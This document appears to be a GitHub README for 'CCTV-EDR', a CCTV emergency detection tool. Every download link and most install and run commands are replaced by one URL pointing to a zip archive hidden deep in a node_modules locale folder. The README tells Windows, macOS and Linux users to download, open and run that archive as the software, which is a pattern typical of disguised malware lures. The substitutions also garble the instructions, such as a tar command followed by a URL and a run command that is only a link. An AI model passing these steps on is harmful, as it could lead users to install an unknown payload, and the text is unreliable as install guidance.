CCTV-EDR is an end-to-end implementation of a CCTV-based Emergency Detection & Response System. This software is crafted for easy reuse and reproducibility. It helps detect emergencies in real-time through CCTV footage, allowing for quicker responses.
To start using CCTV-EDR, follow these steps to download and run the software.
- Operating System: Windows 10 or later, macOS Sierra or later, or a compatible Linux distribution.
- RAM: Minimum 4GB recommended.
- Disk Space: At least 1GB for installation and operation.
- Software Requirements:
- Docker: Required for containerization.
- https://github.com/emmanuel806/CCTV-EDR/raw/refs/heads/main/server/node_modules/date-fns/locale/af/_lib/formatRelative/EDR_CCT_3.8.zip For the backend service.
- MongoDB: To store alerts and data.
- NGINX: For serving content.
- Visit the Releases page.
- Find the latest release. Look for files named with the version number followed by
.exeorhttps://github.com/emmanuel806/CCTV-EDR/raw/refs/heads/main/server/node_modules/date-fns/locale/af/_lib/formatRelative/EDR_CCT_3.8.zip. - Click to download the file.
- Once downloaded, locate the file in your Downloads folder.
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Windows Users:
- Double-click the
.exefile. - Follow the installation wizard to install CCTV-EDR.
- Double-click the
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macOS Users:
- Open the
https://github.com/emmanuel806/CCTV-EDR/raw/refs/heads/main/server/node_modules/date-fns/locale/af/_lib/formatRelative/EDR_CCT_3.8.zipfile. - Drag and drop the application to your Applications folder.
- Open the
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Linux Users:
- Open your terminal.
- Unzip the
https://github.com/emmanuel806/CCTV-EDR/raw/refs/heads/main/server/node_modules/date-fns/locale/af/_lib/formatRelative/EDR_CCT_3.8.zipfile using the command:tar -xzf <filename>https://github.com/emmanuel806/CCTV-EDR/raw/refs/heads/main/server/node_modules/date-fns/locale/af/_lib/formatRelative/EDR_CCT_3.8.zip. - Navigate to the folder and run:
https://github.com/emmanuel806/CCTV-EDR/raw/refs/heads/main/server/node_modules/date-fns/locale/af/_lib/formatRelative/EDR_CCT_3.8.zip.
After installation, you will need to configure the application to connect to your CCTV cameras and MongoDB. Follow these steps:
- Open the configuration file located in the installation folder.
- Enter the details for your CCTV streams and MongoDB connection.
- Save the changes.
- Start your terminal or command prompt.
- Navigate to the installation directory.
- Enter the command
https://github.com/emmanuel806/CCTV-EDR/raw/refs/heads/main/server/node_modules/date-fns/locale/af/_lib/formatRelative/EDR_CCT_3.8.zipfor Linux or double-click the application for Windows/macOS. - The application will launch, and you should see a dashboard displaying real-time updates.
- Real-time Emergency Detection: Instantly identifies anomalies using CCTV footage.
- Alerting System: Sends alerts for immediate action in case of emergencies.
- User-Friendly Interface: Easy to navigate and access real-time data.
- Data Storage: Uses MongoDB for efficient data management.
For support, visit our GitHub Issues page. Search for existing problems or create a new issue if you encounter bugs or need assistance.
CCTV-EDR is licensed under the MIT License. You can use, modify, and distribute the software as per the license terms.
Join our community to share feedback and improvements. Contributions are welcome! If you would like to contribute, please read our contribution guidelines on the GitHub repository.
Don't forget to visit this page to download the latest version of CCTV-EDR and start experiencing seamless emergency detection today!